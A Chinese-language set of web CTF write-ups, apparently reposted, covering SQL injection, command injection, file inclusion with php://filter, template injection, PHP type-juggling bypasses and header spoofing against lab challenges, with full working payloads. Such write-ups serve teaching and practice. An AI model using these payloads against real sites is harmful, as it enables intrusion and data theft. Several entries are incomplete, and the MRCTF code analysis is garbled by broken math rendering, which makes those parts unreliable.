[极客大挑战2019]EasySQL
我们点进靶机,看到是用户名和密码登录,再结合题目sql,我们才想到这个一道SQL注入的题目。
我们使用万能密码,就得到了flag:flag{3faed954-a380-4d93-b802-d1ed776c1b1a}
[极客大挑战2019]Havefun
我们点进靶机,右键检查
得到一段PHP代码,我们分析一下知道使用get方式传参,如果cat=dog ,则输出flag
<!--$cat=$_GET['cat'];echo $cat;if($cat=='dog'){echo 'Syc{cat_cat_cat_cat}';}-->
我们在URL后面添加/?cat=dog,就得到了flag:
[HCTF2018]WarmUp
右键查看页面源代码,看到有个source.php
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>Document</title></head><body><!--source.php--><br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body></html>
我们在URL后面添加/source.php,进入新的页面,发现有个hint.php
<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}?>
我们在原来的界面URL后面加上/hint.php,发现flag在ffffllllaaaagggg里面
我们回到source.php界面,根据代码的要求,在url后面加上/source.php?file=hint.php?ffffllllaaaagggg,发现新界面和source.php界面只是没有照片。
我们的思路就是正确的,可能只是flag不在这个目录,那么我们就遍历目录(…/)试一试,尝试多次后,最终得到flag:flag{d8c68cf3-fc39-4bd5-beec-59144cb9bcb9}
[ACTF2020 新生赛]Include
我们点进靶机,看到以下界面
我们点击“tips",进入一下界面,发现在地址栏这里有一个file=flag.php
我们使用/?file=php://filter/read=convert.base64-encode/resource=flag.php,打开flag.php文件,得到一串base64编码
我们进行base64解码,解码得到一下一串代码,于是flag:flag{3aa81c08-0ea9-42e8-83e8-3724bd2648dd}
<?phpecho "Can you find out the flag?";//flag{3aa81c08-0ea9-42e8-83e8-3724bd2648dd}
[ACTF2020 新生赛]Exec
我们随便输一个ping地址(127.0.0.1),它显示:已发送3个数据包,已接收3个数据包,数据包丢失率为0%。3个数据包都来自127.0.0.1。
输入127.0.0.1;ls /,利用;来输入命令。
我们发现有个·flag文件,输入127.0.0.1;cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}
[GXYCTF2019]Ping Ping Ping
我们点进靶机,进入界面只有这个
我们在URL上面添加/?ip=127.0.0.1,进入一下界面,内容成功回显
我们在URL后面改为添加/?ip=127.0.0.1;ls ,我们发现了flag.php和index.php
URL添加/?ip=127.0.0.1;cat flag.php,发现可能是空格被过滤了
添加/?ip=127.0.0.1;cat<flag.php,发现符号被过滤了
我们看一下index.php,进行相同的操作发现同样被过滤了
构造payload:/?ip=127.0.0.1;a=g;cat$IFS
9fla9fla9flaa.php
我们查看页面源代码,就看到了flag:flag{de261984-10ac-4604-ad11-795d62827f73}
/?ip=<pre>PING 127.0.0.1 (127.0.0.1): 56 data bytes64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.036 ms64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.060 ms64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.059 ms64 bytes from 127.0.0.1: seq=3 ttl=42 time=0.071 ms--- 127.0.0.1 ping statistics ---4 packets transmitted, 4 packets received, 0% packet lossround-trip min/avg/max = 0.036/0.056/0.071 ms<?php$flag = "flag{de261984-10ac-4604-ad11-795d62827f73}";?>
[SUCTF 2019]EasySQL
我们除了输入整数会出现内容,输入其他内容没有任何显现
尝试堆叠注入,输入1;show databases;#
输入1;show columns from Flag;#
在输入*;1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
[强网杯 2019]随便注
输入1
输入1‘
输入1’ or ‘1’=‘1,综合分析这是字符型注入,字段数为2
查询数据库名,输入1’ union select 1,2#,发现回显大量过滤
尝试堆叠注入,输入1’;show databases;#,成功回显,说明存在堆叠注入
查看表,输入1’;show tables;#
查看words,输入1’;show columns from words;#,发现有id,data
输入1’; show columns from 1919810931114514; #,发现flag
输入1’;rename table words to word;rename table 1919810931114514 to words;alter table words change flag id varchar(100);show columns from words;#
我们在输入1’ or '1=1,就得到了flag
[极客大挑战 2019]LoveSQL
点进靶机,发现是用户和密码登录
使用万能密码,显示错误
先判断字段数(/check.php?username=admin&password=1’+order+by+4%23),发现字段数为3
使用联合查询,得到了回显位置
查询数据库名1’ union select 1,2,database()#
查询数据库表名1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘geek’#
查询l0ve1ysq1表的字段名1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘l0ve1ysq1’#
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}
[极客大挑战 2019]Secret File
我们先查看页面源代码,发现有个目录我们点进去看看
<!DOCTYPE html><html><style type="text/css" >#master {position:absolute;left:44%;bottom:0;text-align :center;}p,h1 {cursor: default;}</style><head><meta charset="utf-8"><title>蒋璐源的秘密</title></head><body style="background-color:black;"><br><br><br><br><br><br><h1 style="font-family:verdana;color:red;text-align:center;">你想知道蒋璐源的秘密么?</h1><br><br><br><p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你,去找吧!把一切都放在那里了!</p><a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a><div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div></body></html>
我们在原页面URL后面添加/Archive_room.php
点击secret,我们查看源代码也没有任何有用的东西
我们抓个包试一试,我们发现有一个secr3t.php,我们进入这个目录看一看
我们得到了一段代码,发现flag放在了flag.php里
<html><title>secret</title><meta charset="UTF-8"><?phphighlight_file(__FILE__);error_reporting(0);$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){echo "Oh no!";exit();}include($file);//flag放在了flag.php里?></html>
我们在URL后面添加flag.php,查看页面源代码没有发现任何东西,在根据它说“你看不到我,我就在这里”,猜测可能是PHP的封装协议
我们构造payload:/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
将得到的base64编码进行解码得到一段代码,得到flag:flag{d4fe3fd8-c859-4ab3-9b5e-5079c6f478c3}
<!DOCTYPE html><html><head><meta charset="utf-8"><title>FLAG</title></head><body style="background-color:black;"><br><br><br><br><br><br><h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br><p style="font-family:arial;color:red;font-size:20px;text-align:center;"><?phpecho "我就在这里";$flag = 'flag{d4fe3fd8-c859-4ab3-9b5e-5079c6f478c3}';$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'?></p></body></html>
[极客大挑战 2019]Http
我们查看页面源代码,发现有一个Secret.php
我们进入这个目录,发现这个页面得来自于https://Sycsecret.buuoj.cn,那么我们添加referer
根据提示,我们要使用Syclover浏览器
我们添加User-Agent:Syclover,我们发现要在本地
添加X-Forwarded-For:127.0.0.1,我们于是就得到了flag:flag{2616f8dc-220f-42f9-aba8-c75610c77e6e}
[极客大挑战 2019]Upload
我们查看页面源代码,发现有一个upload_file.php目录
<!DOCTYPE html><html lang="zh"><style>.button {background-color: #5DADE2; /* Green */border: none;color: white;padding: 8px 20px;text-align: center;text-decoration: none;display: inline-block;font-size: 12px;margin: 4px 2px;cursor: pointer;-webkit-transition-duration: 0.4s; /* Safari */transition-duration: 0.4s;border-radius: 8px;}.button:hover {background-color: #555555;color: white;}</style><head><meta charset="UTF-8"><title>上传头像</title><link rel="stylesheet" type="text/css" href="css/reset.css"><link rel="stylesheet" href="css/demo.css" /><link rel="stylesheet" href="dist/styles/Vidage.css" /></head><body><div class="Vidage"><div class="Vidage__image"></div><video id="VidageVideo" class="Vidage__video" preload="metadata" loop autoplay muted><source src="videos/bg.webm" type="video/webm"><source src="videos/bg.mp4" type="video/mp4"></video><div class="Vidage__backdrop"></div></div><form action="upload_file.php" method="post" enctype="multipart/form-data"></br></br></br></br></br></br></br></br></br></br></br></br></br></br></br><div align="center"><label for="file" style="font:20px Georgia,serif;">图片:</label><input type="file" name="file" id="file" ><input type="submit" name="submit" value="提交" class="button"></div></form><script src="dist/scripts/Vidage.min.js"></script><script>new Vidage('#VidageVideo');</script><div style="position: absolute;bottom: 0;width: 95%;"><p align="center" style="font:italic 15px Georgia,serif;"> Syclover @ cl4y</p></div></body></html>
我们在URL后面加上upload_file.php
[极客大挑战 2019]Knife
[ACTF2020 新生赛]Upload
[极客大挑战 2019]BabySQL
输入用户名admin,密码1’
有报错信息知道:存在SQL注入漏洞
尝试常规注入:/check.php?username=admin&password=1’ union select 1#
根据得到的信息,发现union、select可能被过滤了,那么我们尝试双写绕过:/check.php?username=admin&password=1’ ununionion seselectlect 1#
信息继续报错,尝试URL编码,构造payload:/check.php?username=admin&password=1’ ununionion seselectlect 1,2,3%23。出现回显位置2,3
爆数据库:/check.php?username=admin&password=1’ ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23
猜测flag可能就在ctf中,爆表:/check.php?username=admin&password=1’ ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema=“ctf” %23
查字段名:/check.php?username=admin&password=pwd ’ ununionion seselectlect 1,2,group_concat(column_name)frfromom(infoorrmation_schema.columns) whwhereere table_name=“Flag”%23
/check.php?username=admin&password=pwd ’ ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23
于是就得到了flag:
[RoarCTF 2019]Easy Calc
我们随便输入一个计算式,查看页面源代码,也没有发现什么有用的
访问calc.php目录,发现有一个黑名单
尝试/calc.php?num=phpinfo()
在尝试/calc.php? num=phpinfo()
发现/被过滤了,我们尝试使用chr(47)进行目录读取:/calc.php? num=1;var_dump(scandir(chr(47)))
构造:/flagg–chr(47).chr(102).chr(49).chr(97).chr(103)
构造payload:/calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
于是得到flag:flag{0a60def8-e138-4f49-bebd-c1d2b45d528a}
[极客大挑战 2019]BuyFlag
点进界面右上角MENU,在点击PAYFLAG,得到以下界面
查看页面源代码,发现了一段有用的代码
<!--~~~post money and password~~~if (isset($_POST['password'])) {$password = $_POST['password'];if (is_numeric($password)) {echo "password can't be number</br>";}elseif ($password == 404) {echo "Password Right!</br>";}}-->
分析发现:用post方法传参,money=100000000,password为404的同时且不能为数字(弱类型)直接password=404a,
我们抓个包,没看到什么,看了别人的题解发现自己是没有cookie,目前还没有解决这个问题
[BJDCTF2020]Easy MD5
我们查看页面源代码,没发现什么。我们抓个包试一试
[HCTF 2018]admin
界面右上角有一个登录和注册
进入登录界面
进入注册界面
我们先注册一个账号admin/123456,结果显示被注册过;
注册admin/admin,结果显示密码格式错误
在注册123456/123456,显示注册成功
在登陆界面,我们输入123456/123456
查看页面源代码,发现有一段有用的代码,分析一下:可能以admin登录成功,就能得到flag
<h1 class="nav">Hello 123456</h1><!-- you are not admin --><h1 class="nav">Welcome to hctf</h1><script type="text/javascript">$(document).ready(function () {// 点击按钮弹出下拉框$('.ui.dropdown').dropdown();// 鼠标悬浮在头像上,弹出气泡提示框$('.post-content .avatar-link').popup({inline: true,position: 'bottom right',lastResort: 'bottom right'});})</script></body></html>
我们发现右上角这个地方多了一些东西
进入index界面,发现和原界面一样,页面源代码也一样
进入post界面,在页面源代码也没有发现什么
进入logout界面,又回到了最初的界面
进入change password界面,先输入原用户名和密码在登陆,直接输入新密码就可以修改密码了
我们在change password界面的页面源代码发现了一个GitHub网址
<div class="ui grid"><div class="four wide column"></div><div class="eight wide column"><!-- https://github.com/woadsl1234/hctf_flask/ --><form class="ui form segment" method="post" enctype="multipart/form-data"><div class="field required"><label>NewPassword</label><input id="newpassword" name="newpassword" required type="password" value=""></div><input type="submit" class="ui button fluid" value="更换密码"></form></div></div><script type="text/javascript">$(document).ready(function () {// 点击按钮弹出下拉框$('.ui.dropdown').dropdown();// 鼠标悬浮在头像上,弹出气泡提示框$('.post-content .avatar-link').popup({inline: true,position: 'bottom right',lastResort: 'bottom right'});})</script></body></html>
我们访问一下这个网址,呃呃呃呃为什么显示page not fuond
看了其他大佬的WP,发现正常访问这个网址后可以下载一个flask文档,解压后可以打开文件夹的index.html文件(看到的是这个大佬的文章解析:poggioxay)
只要从session中得到的值name为admin就会显现flag
[护网杯 2018]easy_tornado
出现三个链接
点击/flag.txt,发现flag在/fllllllllllllag
点击welcome.txt
render的相关信息
点击/hint.txt,将cookie_secret+filename的值md5加密后的值,整数在md5加密;然后把最后的值赋给filename
我们发现每次点击txt文件,URL都出现了filehash(即加密)。
我们先尝试只输入filename的值而忽略filename,结果出来的内容,URL变成了/error?msg=Error
再结合render的信息,发现问题可能是模板注入,经测试发现过滤了。
构造payload:/error?msg={{1*2}}
继续构造payload:/error?msg={{handler.settings}},得到cookie_secret:31bfac93-3561-4d78-8113-2c3b67c872ad
filename的值md5加密后为3bf9f6cf685a6dd8defadabfb41a03a1
cookie_secret+filename加密后的值为f1be15c3025969d45ea4bda4d5d14077
构造payload:/file?filename=/fllllllllllllag&filehash=f1be15c3025969d45ea4bda4d5d14077
于是得到了flag:flag{5c3d378d-456e-4f9f-b42b-761ceceaa9ec}
[ZJCTF 2019]NiZhuanSiWei
分析代码,发现注释里面有一个useless.php
我们进入useless.php目录,发现是一片空白。
我们在继续分析代码:
构造:data://text/plain,welcome to the zjctf,由于为了1绕过某些过滤,这里用到base64编码
那么我们构造payload:text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
因为有一个可控函数file,构造file=useless.php,又因为对于php文件我们需要进行base64编码,那么我们构造payload:file=php://filter/read=convert.base64-d2VsY29tZSB0byB0aGUgempjdGY=/resource=useless.php
最后卡在这里了,看了其他大佬的WP,大家可以借鉴借鉴。
发现是“构造payload:text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=”这里出现了问题,得到的界面不同。
我直接使用大佬的这个结论构造:/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
再查看页面源代码,于是就得到flag:flag{df640cf7-d303-43f3-be1b-89f1522b842e}
[MRCTF2020]Ez_bypass
点进靶场,原界面
我们分析一下代码:
- include ‘flag.php’;:这行代码包含了一个名为flag.php的文件,这个文件可能包含了一些全局变量或者函数的定义。
f l a g = ′ M R C T F x x x x x x x x x x x x x x x x x x x x x x x x x ′ ; :定义了一个变量 flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';:定义了一个变量 flag=′MRCTFxxxxxxxxxxxxxxxxxxxxxxxxx′;:定义了一个变量flag,它的值是一个以MRCTF{开头的字符串,后面跟着一串未知的字符,这通常是一个安全竞赛中的“flag”,用于证明你已经成功破解了某个挑战。
- if(isset(KaTeX parse error: Expected 'EOF', got '&' at position 12: _GET['gg'])&̲&isset(_GET[‘id’])) {:这个条件检查是否通过GET请求传入了gg和id两个参数。
i d = id= id=_GET[‘id’]; g g = gg= gg=_GET[‘gg’];:如果gg和id参数存在,它们将被赋值给 i d 和 id和 id和gg变量。
- if (md5( i d ) = = = m d 5 ( id) === md5( id)===md5(gg) && $id !== KaTeX parse error: Expected '}', got 'EOF' at end of input: gg) {:这个条件检查id和 g g 的 M D 5 哈希值是否相等,同时确保 gg的MD5哈希值是否相等,同时确保 gg的MD5哈希值是否相等,同时确保id和 g g 本身不相等。这意味着 gg本身不相等。这意味着 gg本身不相等。这意味着id和$gg是两个不同的字符串,但它们的MD5哈希值相同,这种情况非常罕见,因为MD5被认为是一种单向散列函数,不同的输入应该产生不同的输出。
- echo ‘You got the first step’;:如果上述条件满足,输出“你完成了第一步”。
- if(isset($_POST[‘passwd’])) {:检查是否通过POST请求传入了passwd参数。
p a s s w d = passwd= passwd=_POST[‘passwd’];:如果passwd参数存在,将其值赋给$passwd变量。
- if (!is_numeric(KaTeX parse error: Expected '}', got 'EOF' at end of input: passwd)) {:检查passwd是否不是数字。
- if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …==1234567) {:如果passwd不是数字,并且它的值等于1234567,则输出“干得好!”并显示flag.php文件的内容,然后输出“By Retr_0”并结束脚本执行。
- else { echo “can you think twice??”; }:如果$passwd不是数字,并且它的值不等于1234567,则输出提示用户再想想。
- else{ echo ‘You can not get it !’; }:如果$passwd是数字,则输出“你得不到它!”。
- } else{ die(‘only one way to get the flag’); }:如果passwd参数不存在,则输出“只有一种方式可以得到flag”并结束脚本执行。
- } else{ die(‘Please input first’); }:如果gg和id参数不存在,则输出“请先输入”并结束脚本执行。 因为要求md5( i d ) = = m d 5 ( id)==md5( id)==md5(gg)&& i d ! = id!= id!=gg,那么我们使用数组绕过:/?id[]=a&gg[]=b
接着post传参,我们直接传passwd=1234567,却没有任何反应
分析发现这个is_numeric()函数有很大的用处,判断是否为数字或者数字字符串,那么我们这里需要的不是数字和数字字符串 那么那么我构造payload:passwd=1234567a,于是我们就得到了flag:flag{99dcf905-612a-4c9d-b14c-86d7ada9a2fc}
[GXYCTF2019]BabySQli
我们随便输入admin/123456
查看页面源代码,发现目录有一个search.php,页面源代码第一行是一段加密的字符
对加密的字符进行base64和base32解密,得到:select * from user where username = ‘
name′,这看起来是一条SQL查询语句,它似乎用于从数据库中选择用户记录,其中用户名等于某个变量name',这看起来是一条SQL查询语句,它似乎用于从数据库中选择用户记录,其中用户名等于某个变量name′,这看起来是一条SQL查询语句,它似乎用于从数据库中选择用户记录,其中用户名等于某个变量name的值。
我们进行爆字段数:name=admin’ order by 3 #&pw=
我们抓个包试一试
先通过order by来确定有多少列:name=admin’ order by 1 %23&pw=123456!
版权归原作者 小狗菜cai 所有, 如有侵权,请联系我们删除。